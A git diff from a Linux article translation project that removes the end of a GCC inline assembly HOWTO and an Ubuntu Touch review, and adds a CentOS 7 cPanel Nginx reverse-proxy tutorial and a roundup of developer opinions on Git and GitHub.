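-                              : "memory");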
-
-    Here, the value of my_var is decremented by one, and if the resulting value is `0` then the variable cond is set. We can add atomicity by adding the instruction "lock;\n\t" as the first instruction in the assembler template.
-
- In a similar way we can use "incl %0" instead of "decl %0", so as to increment my_var.
-
- Points to note here are that (i) my_var is a variable residing in memory. (ii) cond is in any of the registers eax, ebx, ecx and edx. The constraint "=q" guarantees it. (iii) And we can see that memory is there in the clobber list. ie, the code is changing the contents of memory.
-
-3. How to set/clear a bit in a register? As next recipe, we are going to see it.
-
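-    A sketch (ADDR stands for a memory variable, pos for an int between 0 and 31):
-
-        __asm__ __volatile__ ("btsl %1,%0"
-                              : "=m" (ADDR)
-                              : "Ir" (pos)
-                              : "cc");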
-
-    Here, the bit at position ’pos’ of the variable at ADDR (a memory variable) is set to `1`. We can use ’btrl’ instead of ’btsl’ to clear the bit. The constraint "Ir" of pos says that pos is in a register and its value ranges from 0-31 (an x86-dependent constraint). ie, we can set/clear any bit from the 0th to the 31st of the variable at ADDR. As the condition codes will be changed, we add "cc" to the clobber list.
-
-4. Now we look at a more complicated but useful function: string copy.
-
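-    A sketch of the copy (this is essentially the classic x86 kernel version):
-
-        static inline char *strcpy(char *dest, const char *src)
-        {
-                int d0, d1, d2;
-                __asm__ __volatile__ ("1:\tlodsb\n\t"
-                                      "stosb\n\t"
-                                      "testb %%al,%%al\n\t"
-                                      "jne 1b"
-                                      : "=&S" (d0), "=&D" (d1), "=&a" (d2)
-                                      : "0" (src), "1" (dest)
-                                      : "memory");
-                return dest;
-        }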
-
-    The source address is stored in esi and the destination in edi; then the copy starts, and when we reach **0**, copying is complete. The constraints "&S", "&D", "&a" say that the registers esi, edi and eax are early-clobber registers, ie, their contents will change before the completion of the function. It is also clear here why memory is in the clobber list.
-
- We can see a similar function which moves a block of double words. Notice that the function is declared as a macro.
-
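-    A sketch (dummy outputs mark the registers as modified, since a register
-    may not appear both as an input and in the clobber list):
-
-        #define mov_blk(src, dest, numwords) \
-        do { \
-                int d0, d1, d2; \
-                __asm__ __volatile__ ("cld\n\t" \
-                                      "rep\n\t" \
-                                      "movsl" \
-                                      : "=&c" (d0), "=&S" (d1), "=&D" (d2) \
-                                      : "0" (numwords), "1" (src), "2" (dest) \
-                                      : "memory"); \
-        } while (0)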
-
-    Here we have no outputs that we actually use; the changes that happen to the contents of the registers ecx, esi and edi are side effects of the block movement. So we have to tell gcc about them; since a register may not appear both as an input and in the clobber list, the sketch above does this with dummy outputs.
-
-5. In Linux, system calls are implemented using GCC inline assembly. Let us look how a system call is implemented. All the system calls are written as macros (linux/unistd.h). For example, a system call with three arguments is defined as a macro as shown below.
-
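-    A sketch modeled on the old linux/unistd.h definition (the __syscall_return macro checks for errors and sets errno):
-
-        #define _syscall3(type,name,type1,arg1,type2,arg2,type3,arg3) \
-        type name(type1 arg1,type2 arg2,type3 arg3) \
-        { \
-        long __res; \
-        __asm__ volatile ("int $0x80" \
-                          : "=a" (__res) \
-                          : "0" (__NR_##name), "b" ((long)(arg1)), "c" ((long)(arg2)), \
-                            "d" ((long)(arg3))); \
-        __syscall_return(type,__res); \
-        }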
-
-    Whenever a system call with three arguments is made, the macro shown above is used to make the call. The syscall number is placed in eax, then each parameter in ebx, ecx, edx. Finally "int 0x80" is the instruction which makes the system call work. The return value can be collected from eax.
-
-    Every system call is implemented in a similar way. Exit is a single-parameter syscall; let’s see what its code will look like. It is as shown below.
-
-        {
-                asm("movl $1,%eax;\n\t"    /* SYS_exit is 1 */
-                    "xorl %ebx,%ebx;\n\t"  /* argument is in ebx, it is 0 */
-                    "int $0x80");          /* enter kernel mode */
-        }
-
-    The syscall number of exit is "1" and here its parameter is 0. So we arrange eax to contain 1 and ebx to contain 0, and by `int $0x80`, `exit(0)` is executed. This is how exit works.
-
-* * *
-
-## 8. Concluding Remarks.
-
-This document has gone through the basics of GCC Inline Assembly. Once you have understood the basic concept, it is not difficult to take further steps on your own. We saw some examples which are helpful in understanding the frequently used features of GCC Inline Assembly.
-
-GCC inlining is a vast subject and this article is by no means complete. More details about the syntax we discussed are available in the official documentation for the GNU Assembler. Similarly, for a complete list of the constraints, refer to the official documentation of GCC.
-
-And of course, the Linux kernel uses GCC inline assembly on a large scale. So we can find many examples of various kinds in the kernel sources; they can help us a lot.
-
-If you have found any glaring typos, or outdated info in this document, please let us know.
-
-* * *
-
-## 9. References.
-
-1. [Brennan’s Guide to Inline Assembly](http://www.delorie.com/djgpp/doc/brennan/brennan_att_inline_djgpp.html)
-2. [Using Assembly Language in Linux](http://linuxassembly.org/articles/linasm.html)
-3. [Using as, The GNU Assembler](http://www.gnu.org/manual/gas-2.9.1/html_mono/as.html)
-4. [Using and Porting the GNU Compiler Collection (GCC)](http://gcc.gnu.org/onlinedocs/gcc_toc.html)
-5. [Linux Kernel Source](http://ftp.kernel.org/)
-
-* * *
-via: http://www.ibiblio.org/gferg/ldp/GCC-Inline-Assembly-HOWTO.html
-
-作者:[Sandeep.S](mailto:busybox@sancharnet.in)
-译者:[译者ID](https://github.com/译者ID)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](http://linux.cn/) 荣誉推出
diff --git a/sources/tech/20151227 Ubuntu Touch, three years later.md b/sources/tech/20151227 Ubuntu Touch, three years later.md
deleted file mode 100644
index 3d467163cf..0000000000
--- a/sources/tech/20151227 Ubuntu Touch, three years later.md
+++ /dev/null
@@ -1,68 +0,0 @@
-Back in early 2013, your editor [dedicated a sacrificial handset][2] to the testing of the then-new Ubuntu Touch distribution. At that time, things were so unbaked that the distribution came with mocked-up data for unready apps; it even came with a set of fake tweets. Nearly three years later, it seemed time to give Ubuntu Touch another try on another sacrificial device. This distribution has certainly made some progress in those years, but, sadly, it still seems far from being a competitive offering in this space.
-
-In particular, your editor tested version 16.04r3 from the testing channel on a Nexus 4 handset. The Nexus 4 is certainly past its prime at the end of 2015, but it still functions as a credible Android device. It is, in any case, the only phone handset on [the list of supported devices][1] other than the three that were sold (in locations far from your editor's home) with Ubuntu Touch pre-installed. It is a bit discouraging that Ubuntu Touch is not supported on a more recent device; the Nexus 4 was discontinued over two years ago.
-
-People who are accustomed to putting strange systems on Nexus devices know the drill fairly well: unlock the bootloader, install a new recovery image if necessary, then use the **fastboot** tool to flash a new image. Ubuntu Touch does not work that way; instead, one must use a set of tools available only on the Ubuntu desktop distribution. Your editor's current menagerie of systems does not include any of those, but, fortunately, running the Ubuntu 15.10 distribution off a USB drive works just fine. It must be said, though, that Ubuntu appears not to have gotten the memo regarding high-DPI laptop displays; 15.10 is an exercise in eyestrain on such a device.
-
-Once the requisite packages have been installed, the **ubuntu-device-flash** command can be used to install Ubuntu Touch on the phone. It finds the installation image wherever Canonical hides them (it's not obvious where that is) and puts it onto the phone; the process, on the Nexus 4, took about three hours — a surprisingly long time. Among other things, it installs a Ubuntu-specific recovery image, regardless of whether that should be necessary or not. The installation takes up about 4.5GB of space on the device. At the end, the phone reboots and comes up with the Ubuntu Touch lock screen, which has changed little in the last three years. The first boot takes a discouragingly long time, but subsequent reboots are faster, perhaps faster than Android on the same device.
-
-Alas, that's about the only thing that is faster than Android. The phone starts sluggish and gets worse as time goes on. At one point it took a solid minute to get the dialer screen up on the running device. Scrolling can be jerky and unpleasant to work with. At least once, the phone bogged down to the point that there was little alternative to shutting it down and starting over.
-
-Logging into the device over the USB connection offers some clues as to why that might be. There were no less than 258 processes running on the system. A number of them have "evolution" in their name, which is never a good sign even on a heftier system. Daemons like NetworkManager and pulseaudio are running. In general, Ubuntu Touch seems to have a large number of relatively large moving parts, leading, seemingly, to memory pressure and a certain amount of thrashing.
-
-Three years ago, Ubuntu Touch was built on an Android chassis. There are still bits of Android that show up here and there (it uses binder, for example), but a number of those components have been replaced. This release runs an Android-derived kernel that identifies itself as "3.4.0-7 #39-Ubuntu". 3.4.0 was released in May 2012, so it is getting a bit long in the tooth; the 3.4.0 number suggests this kernel hasn't even gotten the stable updates that followed that release. Finding the source for the kernel in this distribution is not easy; it must almost certainly be hidden somewhere in this Gerrit repository, but your editor ran out of time while trying to find it. The SurfaceFlinger display manager has been replaced by Ubuntu's own Mir, with Unity providing the interface. Upstart is the init system, despite the fact that Ubuntu has moved to systemd on desktop systems.
-
-When one moves beyond the command-line interface and starts playing with the touchscreen, one finds that the basics of the interface resemble what was demonstrated three years ago. Swiping from the left edge brings the Unity icon bar (but no longer switches to a home screen; the "home screen" concept doesn't really seem to exist anymore). Swiping from the right will either switch to another application or produce an overview of running applications; it's not clear how it decides which. The overview provides a cute oblique view of the running applications; it's sufficient to choose one, but seems somewhat wasteful of screen space. Swiping up from the bottom produces an application-specific menu — usually.
-
-![][3]
-
-
-The swipe gestures work well enough once one gets used to them, but there is scope for confusion. The camera app, for example, will instruct the user to "swipe left for photo roll," but, unless one is careful to avoid the right edge of the screen, that gesture will yield the overview screen instead. One can learn subtleties like "swipes involving the edge" and "swipes avoiding the edge," but one could argue that such an interface is more difficult than it needs to be and less discoverable than it could be.
-
-![][4]
-
-Speaking of the camera app, it takes pictures as one might expect, and it has gained a high-dynamic-range mode in recent years. It still has no support for stitching together photos in a panorama or "photo sphere" mode, though.
-
-![][5]
-
-The base distribution comes with a fairly basic set of apps. Many of them appear to be interfaces to an associated web page; the Amazon, GMail, and Facebook apps, for example. Something called "Shorts" appears to be an RSS reader, though it seems impervious to the addition of arbitrary feeds. There is a terminal app, but it prompts for a password — a bit surprising given that no password had ever been supplied for the device (it turns out that one should use the screen-lock PIN here). It's not clear that this extra level of "security" is helpful, given that the user involved is already able to install, launch, and run applications on the device, but so it goes.
-
-Despite the presence of all those evolution processes, there is no IMAP-capable email app; there are also no mapping apps. There is a rudimentary web browser with Ubuntu branding; it appears that this browser is based on Chromium. The weather app is limited to a few dozen hardwired locations worldwide; the closest supported location to LWN headquarters was Houston, which, one assumes, is unlikely to be dealing with the foot of snow your editor had to shovel while partway through this article. One suspects we would have heard about that.
-
-![][6]
-
-Inevitably, there is a store from which one can obtain other apps. There are, for example, a couple of seemingly capable, OpenStreetMap-based mapping apps there, including one that claims turn-by-turn navigation, but nothing requiring GPS access worked in your editor's tests. Games abound, of course, but there is little in the way of apps that are well known in the Android or iOS worlds. The store will refuse to allow the installation of apps until one creates a "Ubuntu One" account; that is unfortunate, but most Android users never get anywhere near that far before having to create or supply a Google account.
-
-![][7]
-
-Canonical puts a fair amount of energy into promoting its "scopes," which are said to be better than apps for the aggregation of content. In truth, they seem to just be another type of app with a focus on gathering information from more than one source. Although, with "branded scopes," the "more than one source" part is often deliberately put by the wayside. Your editor played around with scopes for a while, but, in truth, could not find what was supposed to make them special.
-
-Permissions management in Ubuntu Touch resembles that found in recent Android releases: the user will be prompted the first time an application tries to exercise a specific privilege. As with Android, the number of actions requiring privilege is relatively small, and "connect to any arbitrary site on the Internet" is not among them. Access to location information or the camera, though, will generate a prompt. There is also, again as with Android, a way to control which applications are allowed to place notifications on the screen.
-
-Ubuntu Touch still seems to drain the battery far more quickly than Android does on the same device. Indeed, it is barely able to get through the night while sitting idle. There is a cute battery app that offers a couple of "ways to reduce battery use," but it lacks Android's ability to say which apps are actually draining the battery (though, it must be said, that information from Android is often less helpful than one might hope).
-
-![][8]
-
-The keyboard now has proper multi-lingual support (though there is no visual indication of which language is currently in effect) and, as with Android, one can switch between languages on the fly. It offers word suggestions, does [Keyboard] spelling correction, and all the usual things. One missing feature, though, is "swipe" typing which, your editor has found, can speed the process of inputting text on a small keyboard considerably. There is also no voice input; no major loss from your editor's point of view, but others will probably see that differently.
-
-There is a lot to like in Ubuntu Touch. There is some appeal to running something that looks like a proper Linux system, even if it still has a number of Ubuntu-specific components. One does not get the sense that the device is watching quite as closely as Android devices do, though it's not entirely clear, for example, what happens with location data or where it might be stored. In any case, a Ubuntu device clearly has more free software on it than most alternatives do; there is no proprietary "play services" layer maintaining control over the system.
-
-Sadly, though, this distribution still is not up to the capabilities and the performance of the big alternatives. Switching to Ubuntu Touch means settling for a much slower system, running on a severely limited set of devices, with a relative scarcity of apps to choose from. Your editor would very much like to see a handset distribution that is more free and more open than the alternatives, but that distribution must also be competitive with those alternatives, and that does not seem to be the case here. Unless Canonical can find a way to close the performance and feature gaps with Android, it seems unlikely to have much hope of achieving uptake that is within a few orders of magnitude of Android's.
-
---------------------------------------
-
-via: https://lwn.net/Articles/667983/
-
-作者:Jonathan Corbet
-译者:[译者ID](https://github.com/译者ID)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[1]: https://developer.ubuntu.com/en/start/ubuntu-for-devices/devices/
-[2]: https://lwn.net/Articles/540138/
-[3]: https://static.lwn.net/images/2015/utouch/overview-sm.png
-[4]: https://static.lwn.net/images/2015/utouch/camera-swipe-sm.png
-[5]: https://static.lwn.net/images/2015/utouch/terminal.png
-[6]: https://static.lwn.net/images/2015/utouch/gps-sm.png
-[7]: https://static.lwn.net/images/2015/utouch/camera-perm.png
-[8]: https://static.lwn.net/images/2015/utouch/schifo.png
diff --git a/sources/tech/20160104 What is good stock portfolio management software on Linux.md b/sources/tech/20160104 What is good stock portfolio management software on Linux.md
index b7c372ce71..258cf104fc 100644
--- a/sources/tech/20160104 What is good stock portfolio management software on Linux.md
+++ b/sources/tech/20160104 What is good stock portfolio management software on Linux.md
@@ -1,4 +1,3 @@
-translating by fw8899
What is good stock portfolio management software on Linux
================================================================================
If you are investing in the stock market, you probably understand the importance of a sound portfolio management plan. The goal of portfolio management is to come up with the best investment plan tailored for you, considering your risk tolerance, time horizon and financial goals. Given its importance, no wonder there are no shortage of commercial portfolio management apps and stock market monitoring software, each touting various sophisticated portfolio performance tracking and reporting capabilities.
diff --git a/sources/tech/20160218 How to Set Nginx as Reverse Proxy on Centos7 CPanel.md b/sources/tech/20160218 How to Set Nginx as Reverse Proxy on Centos7 CPanel.md
new file mode 100644
index 0000000000..dc21bc0b23
--- /dev/null
+++ b/sources/tech/20160218 How to Set Nginx as Reverse Proxy on Centos7 CPanel.md
@@ -0,0 +1,203 @@
+zky001开始翻译
+
+How to Set Nginx as Reverse Proxy on Centos7 CPanel
+================================================================================
+
+Nginx is one of the fastest and most powerful web servers, known for its high performance and low resource utilization. It can be installed both as a standalone web server and as a reverse proxy. In this article, I'll walk through the installation of Nginx as a reverse proxy alongside Apache on a cPanel server with the latest CentOS 7 installed.
+
+As a reverse proxy, Nginx works as the front-end web server serving static content, while Apache serves the dynamic files in the backend. This setup boosts overall server performance.
+
+Let's walk through the installation steps for Nginx as a reverse proxy on a CentOS 7 x86_64 server with cPanel 11.52 installed.
+
+First of all, we need to install the EPEL repo to get started.
+
+### Step 1: Install the EPEL repo. ###
+
+ root@server1 [/usr]# yum -y install epel-release
+ Loaded plugins: fastestmirror, tsflags, universal-hooks
+ Loading mirror speeds from cached hostfile
+ * EA4: 66.23.237.210
+ * base: mirrors.linode.com
+ * extras: mirrors.linode.com
+ * updates: mirrors.linode.com
+ Resolving Dependencies
+ --> Running transaction check
+ ---> Package epel-release.noarch 0:7-5 will be installed
+ --> Finished Dependency Resolution
+
+ Dependencies Resolved
+
+ ===============================================================================================================================================
+ Package Arch Version Repository Size
+ ===============================================================================================================================================
+ Installing:
+ epel-release noarch 7-5 extras 14 k
+
+### Step 2: Install the nDeploy RPM repo for CentOS, which provides the required nDeploy web stack and Nginx plugin. ###
+
+ root@server1 [/usr]# yum -y install http://rpm.piserve.com/nDeploy-release-centos-1.0-1.noarch.rpm
+ Loaded plugins: fastestmirror, tsflags, universal-hooks
+ nDeploy-release-centos-1.0-1.noarch.rpm | 1.7 kB 00:00:00
+ Examining /var/tmp/yum-root-ei5tWJ/nDeploy-release-centos-1.0-1.noarch.rpm: nDeploy-release-centos-1.0-1.noarch
+ Marking /var/tmp/yum-root-ei5tWJ/nDeploy-release-centos-1.0-1.noarch.rpm to be installed
+ Resolving Dependencies
+ --> Running transaction check
+ ---> Package nDeploy-release-centos.noarch 0:1.0-1 will be installed
+ --> Finished Dependency Resolution
+
+ Dependencies Resolved
+
+ ===============================================================================================================================================
+ Package Arch Version Repository Size
+ ===============================================================================================================================================
+ Installing:
+ nDeploy-release-centos noarch 1.0-1 /nDeploy-release-centos-1.0-1.noarch 110
+
+### Step 3: Install the nDeploy and nginx-nDeploy packages. ###
+
+ root@server1 [/usr]# yum --enablerepo=ndeploy install nginx-nDeploy nDeploy
+ Loaded plugins: fastestmirror, tsflags, universal-hooks
+ epel/x86_64/metalink | 9.9 kB 00:00:00
+ epel | 4.3 kB 00:00:00
+ ndeploy | 2.9 kB 00:00:00
+ (1/4): ndeploy/7/x86_64/primary_db | 14 kB 00:00:00
+ (2/4): epel/x86_64/group_gz | 169 kB 00:00:00
+ (3/4): epel/x86_64/primary_db | 3.7 MB 00:00:02
+
+ Dependencies Resolved
+
+ ===============================================================================================================================================
+ Package Arch Version Repository Size
+ ===============================================================================================================================================
+ Installing:
+ nDeploy noarch 2.0-11.el7 ndeploy 80 k
+ nginx-nDeploy x86_64 1.8.0-34.el7 ndeploy 36 M
+ Installing for dependencies:
+ PyYAML x86_64 3.10-11.el7 base 153 k
+ libevent x86_64 2.0.21-4.el7 base 214 k
+ memcached x86_64 1.4.15-9.el7 base 84 k
+ python-inotify noarch 0.9.4-4.el7 base 49 k
+ python-lxml x86_64 3.2.1-4.el7 base 758 k
+
+ Transaction Summary
+ ===============================================================================================================================================
+ Install 2 Packages (+5 Dependent packages)
+
+With these steps, we've completed the installation of the Nginx plugin on our server. Now we need to configure Nginx as a reverse proxy and create virtual hosts for the existing cPanel user accounts. For that, we can run the following script.
+
+### Step 4: Enable Nginx as the front-end web server and create the default configuration files. ###
+
+ root@server1 [/usr]# /opt/nDeploy/scripts/cpanel-nDeploy-setup.sh enable
+ Modifying apache http and https port in cpanel
+
+ httpd restarted successfully.
+ Created symlink from /etc/systemd/system/multi-user.target.wants/nginx.service to /usr/lib/systemd/system/nginx.service.
+ Created symlink from /etc/systemd/system/multi-user.target.wants/ndeploy_watcher.service to /usr/lib/systemd/system/ndeploy_watcher.service.
+ Created symlink from /etc/systemd/system/multi-user.target.wants/ndeploy_backends.service to /usr/lib/systemd/system/ndeploy_backends.service.
+ ConfGen:: saheetha
+ ConfGen:: satest
+
+As you can see, this script moves Apache from port 80 to another port so that Nginx can run as the front-end web server, and it creates the virtual host configuration files for the existing cPanel accounts. Once it is done, confirm the status of both Apache and Nginx.
+
+### Apache Status: ###
+
+ root@server1 [/var/run/httpd]# systemctl status httpd
+ ● httpd.service - Apache Web Server
+ Loaded: loaded (/usr/lib/systemd/system/httpd.service; enabled; vendor preset: disabled)
+ Active: active (running) since Mon 2016-01-18 06:34:23 UTC; 12s ago
+ Process: 25606 ExecStart=/usr/sbin/apachectl start (code=exited, status=0/SUCCESS)
+ Main PID: 24760 (httpd)
+ CGroup: /system.slice/httpd.service
+ ‣ 24760 /usr/local/apache/bin/httpd -k start
+
+ Jan 18 06:34:23 server1.centos7-test.com systemd[1]: Starting Apache Web Server...
+ Jan 18 06:34:23 server1.centos7-test.com apachectl[25606]: httpd (pid 24760) already running
+ Jan 18 06:34:23 server1.centos7-test.com systemd[1]: Started Apache Web Server.
+
+### Nginx Status: ###
+
+ root@server1 [~]# systemctl status nginx
+ ● nginx.service - nginx-nDeploy - high performance web server
+ Loaded: loaded (/usr/lib/systemd/system/nginx.service; enabled; vendor preset: disabled)
+ Active: active (running) since Sun 2016-01-17 17:18:29 UTC; 13h ago
+ Docs: http://nginx.org/en/docs/
+ Main PID: 3833 (nginx)
+ CGroup: /system.slice/nginx.service
+ ├─ 3833 nginx: master process /usr/sbin/nginx -c /etc/nginx/nginx.conf
+ ├─25473 nginx: worker process
+ ├─25474 nginx: worker process
+ └─25475 nginx: cache manager process
+
+ Jan 17 17:18:29 server1.centos7-test.com systemd[1]: Starting nginx-nDeploy - high performance web server...
+ Jan 17 17:18:29 server1.centos7-test.com nginx[3804]: nginx: the configuration file /etc/nginx/nginx.conf syntax is ok
+ Jan 17 17:18:29 server1.centos7-test.com nginx[3804]: nginx: configuration file /etc/nginx/nginx.conf test is successful
+ Jan 17 17:18:29 server1.centos7-test.com systemd[1]: Started nginx-nDeploy - high performance web server.
+
+Nginx acts as the front-end web server running on port 80, while the Apache configuration is modified to listen on HTTP port 9999 and HTTPS port 4430. Please see their status below:
+
+ root@server1 [/usr/local/src]# netstat -plan | grep httpd
+ tcp 0 0 0.0.0.0:4430 0.0.0.0:* LISTEN 17270/httpd
+ tcp 0 0 0.0.0.0:9999 0.0.0.0:* LISTEN 17270/httpd
+ tcp6 0 0 :::4430 :::* LISTEN 17270/httpd
+ tcp6 0 0 :::9999 :::* LISTEN 17270/httpd
+
+![apacheport](http://blog.linoxide.com/wp-content/uploads/2016/01/apacheport.png)
+
+ root@server1 [/usr/local/src]# netstat -plan | grep nginx
+ tcp 0 0 127.0.0.1:80 0.0.0.0:* LISTEN 17802/nginx: master
+ tcp 0 0 45.79.183.73:80 0.0.0.0:* LISTEN 17802/nginx: master
+
+The virtual host entries created for the existing users are located in the folder "**/etc/nginx/sites-enabled**". This path is included from the main Nginx configuration file.
+
+ root@server1 [/etc/nginx/sites-enabled]# ll | grep .conf
+ -rw-r--r-- 1 root root 311 Jan 17 09:02 saheetha.com.conf
+ -rw-r--r-- 1 root root 336 Jan 17 09:02 saheethastest.com.conf
+
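+The inclusion is done from the http block of /etc/nginx/nginx.conf. The exact line is generated by nDeploy, so treat the following as an illustrative sketch only:
+
+    http {
+        # ... other settings ...
+        # pull in the per-account virtual host files
+        include /etc/nginx/sites-enabled/*.conf;
+    }
+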
+### Sample Vhost for a domain: ###
+
+ server {
+
+ listen 45.79.183.73:80;
+ #CPIPVSIX:80;
+
+ # ServerNames
+ server_name saheetha.com www.saheetha.com;
+ access_log /usr/local/apache/domlogs/saheetha.com main;
+ access_log /usr/local/apache/domlogs/saheetha.com-bytes_log bytes_log;
+
+ include /etc/nginx/sites-enabled/saheetha.com.include;
+
+ }
+
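+The reverse proxying itself happens in the referenced .include file, which nDeploy generates per domain. Its exact contents will vary, but a minimal hand-written equivalent, assuming Apache listens on HTTP port 9999 as shown above, might look like this:
+
+    location / {
+        # hand every request to the Apache backend on its new HTTP port
+        proxy_pass http://127.0.0.1:9999;
+        # preserve the original host and client address for Apache's logs
+        proxy_set_header Host $host;
+        proxy_set_header X-Real-IP $remote_addr;
+        proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
+    }
+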
+We can confirm that the web server is working by opening a website in the browser. Please see the web server information on my server after the installation.
+
+ root@server1 [/home]# ip a | grep -i eth0
+    3: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP qlen 1000
+ inet 45.79.183.73/24 brd 45.79.183.255 scope global dynamic eth0
+ root@server1 [/home]# nginx -v
+ nginx version: nginx/1.8.0
+
+![webserver-status](http://blog.linoxide.com/wp-content/uploads/2016/01/webserver.png)
+
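+You can double-check from the shell as well. Assuming one of the hosted domains resolves to this server, a quick header request should show Nginx answering on port 80 (the output below is illustrative):
+
+    # curl -I http://saheetha.com
+    HTTP/1.1 200 OK
+    Server: nginx/1.8.0
+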
+A virtual host is created automatically for any newly created account in cPanel. With these simple steps, we can configure Nginx as a reverse proxy on a CentOS 7/cPanel server.
+
+### Advantages of Nginx as a Reverse Proxy: ###
+
+ 1. Easy to install and configure
+ 2. High performance and efficient resource usage
+ 3. Helps absorb traffic spikes and mitigate some DDoS attacks
+ 4. .htaccess rewrite rules keep working, since Apache still handles the dynamic requests in the backend
+
+I hope this article is useful to you. Thank you for reading, and I would appreciate your comments and suggestions for further improvements.
+
+--------------------------------------------------------------------------------
+
+via: http://linoxide.com/linux-how-to/set-nginx-reverse-proxy-centos-7-cpanel/
+
+作者:[Saheetha Shameer][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:http://linoxide.com/author/saheethas/
diff --git a/sources/tech/20160218 What do Linux developers think of Git and GitHub.md b/sources/tech/20160218 What do Linux developers think of Git and GitHub.md
new file mode 100644
index 0000000000..b444b0958c
--- /dev/null
+++ b/sources/tech/20160218 What do Linux developers think of Git and GitHub.md
@@ -0,0 +1,95 @@
+@4357 翻译中
+
+What do Linux developers think of Git and GitHub?
+=====================================================
+
+**Also in today’s open source roundup: DistroWatch reviews XStream Desktop 153, and Street Fighter V is coming to Linux and SteamOS in the spring**
+
+## What do Linux developers think of Git and GitHub?
+
+The popularity of Git and GitHub among Linux developers is well established. But what do developers think of them? And should GitHub really be synonymous with Git itself? A Linux redditor recently asked about this and got some very interesting answers.
+
+Dontwakemeup46 asked his question:
+
+>I am learning Git and Github. What I am interested in is how these two are viewed by the community. That git and github are used extensively, is something I know. But are there serious issues with either Git or Github? Something that the community would love to change?
+
+[More at Reddit](https://www.reddit.com/r/linux/comments/45jy59/the_popularity_of_git_and_github/)
+
+His fellow Linux redditors responded with their thoughts about Git and GitHub:
+
+>**Derenir**: “Github is not affliated with Git.
+
+>Git is made by Linus Torvalds.
+
+>Github hardly supports Linux.
+
+>Github is a corporate bordelo that tries to make money from Git.
+
+>[https://desktop.github.com/](https://desktop.github.com/) see here no Linux Support.”
+
+>**Bilog78**: “A minor update: git hasn't been ‘made by Linus Torvalds’ for a while. The maintainer is Junio C Hamano and the main contributors after him are Jeff King and Shawn O. Pearce.”
+
+>**Fearthefuture**: “I like git but can't understand why people even use github anymore. From my point of view the only thing it does better than bitbucket are user statistics and the larger userbase. Bitbucket has unlimited free private repos, much better UI and very good integration with other services such as Jenkins.”
+
+>**Thunger**: “Gitlab.com is also nice, especially since you can host your own instance on your own servers.”
+
+>**Takluyver**: “Lots of people are familiar with the UI of Github and associated services like Travis, and lots of people already have Github accounts, so it's a good place for projects to be. People also use their Github profile as a kind of portfolio, so they're motivated to put more projects on there. Github is a de facto standard for hosting open source projects.”
+
+>**Tdammers**: “Serious issue with git would be the UI, which is kind of counterintuitive, to the point that many users just stick with a handful of memorized incantations.
+
+>Github: most serious issue here is that it's a proprietary hosted solution; you buy convenience, and the price is that your code is on someone else's server and not under your control anymore. Another common criticism of github is that its workflow isn't in line with the spirit of git itself, particularly the way pull requests work. And finally, github is monopolizing the code hosting landscape, and that's bad for diversity, which in turn is crucial for a thriving free software community.”
+
+>**Dies**: “How is that the case? More importantly, if that is the case, then what's done is done and I guess we're stuck with Github since they control so many projects.”
+
+>**Tdammers**: “The code is hosted on someone else's server, "someone else" in this case being github. Which, for an open-source project, is not typically a huge problem, but still, you don't control it. If you have a private project on github, then the only assurance you have that it will remain private is github's word for it. If you decide to delete things, then you can never be sure whether it's been deleted, or just hidden.
+
+>Github doesn't control the projects themselves (you can always take your code and host it elsewhere, declaring the new location the "official" one), it just has deeper access to the code than the developers themselves.”
+
+>**Drelos**: “I have read a lot of praises and bad stuff about Github ([here's an example](http://www.wired.com/2015/06/problem-putting-worlds-code-github/)) but my simple noob question is why aren't efforts towards a free and open "version"?”
+
+>**Twizmwazin**: “GitLab is sorta pushing there.”
+
+[More at Reddit](https://www.reddit.com/r/linux/comments/45jy59/the_popularity_of_git_and_github/)
+
+## DistroWatch reviews XStream Desktop 153
+
+XStreamOS is a version of Solaris created by Sonicle. XStream Desktop brings the power of Solaris to desktop users, and distrohoppers might be interested in checking it out. DistroWatch did a full review of XStream Desktop 153 and found that it performed fairly well.
+
+Jesse Smith reports for DistroWatch:
+
+>I think XStream Desktop does a lot of things well. Admittedly, my trial got off to a rocky start when the operating system would not boot on my hardware and I could not get the desktop to use my display's full screen resolution when running in VirtualBox. However, after that, XStream performed fairly well. The installer works well, the operating system automatically sets up and uses boot environments, insuring we can recover the system if something goes wrong. The package management tools work well and XStream ships with a useful collection of software.
+
+>I did run into a few problems playing media, specifically getting audio to work. I am not sure if that is another hardware compatibility issue or a problem with the media software that ships with the operating system. On the other hand, tools such as the web browser, e-mail, productivity suite and configuration tools all worked well.
+
+>What I appreciate about XStream the most is that the operating system is a branch of the OpenSolaris family that is being kept up to date. Other derivatives of OpenSolaris tend to lag behind, at least with desktop software, but XStream is still shipping recent versions of Firefox and LibreOffice.
+
+>For me personally, XStream is missing a few components, like a printer manager, multimedia support and drivers for my specific hardware. Other aspects of the operating system are quite attractive. I like the way the developers have set up LXDE, I like the default collection of software and I especially like the way file system snapshots and boot environments are enabled out of the box. Most Linux distributions, openSUSE aside, have not caught on to the usefulness of boot environments yet and I hope it is a technology that is picked up by more projects.
+
+[More at DistroWatch](http://distrowatch.com/weekly.php?issue=20160215#xstreamos)
+
+## Street Fighter V and SteamOS
+
+Street Fighter is one of the most well known game franchises of all time, and now [Capcom has announced](http://steamcommunity.com/games/310950/announcements/detail/857177755595160250) that Street Fighter V will be coming to Linux and SteamOS in the spring. This is great news for Linux gamers.
+
+Joe Parlock reports for Destructoid:
+
+>Are you one of the less than one percent of Steam users who play on a Linux-based system? Are you part of the even smaller percentage of people who play on Linux and are excited for Street Fighter V? Well, I’ve got some good news for you.
+
+>Capcom has announced via Steam that Street Fighter V will be coming to SteamOS and other Linux operating systems sometime this spring. It’ll come at no extra cost, so those who already own the PC build of the game will just be able to install it on Linux and be good to go.
+
+[More at Destructoid](http://steamcommunity.com/games/310950/announcements/detail/857177755595160250)
+
+Did you miss a roundup? Check the [Eye On Open home page](http://www.infoworld.com/blog/eye-on-open/) to get caught up with the latest news about open source and Linux.
+
+------------------------------------------------------------------------------
+
+via: http://www.infoworld.com/article/3033059/linux/what-do-linux-developers-think-of-git-and-github.html
+
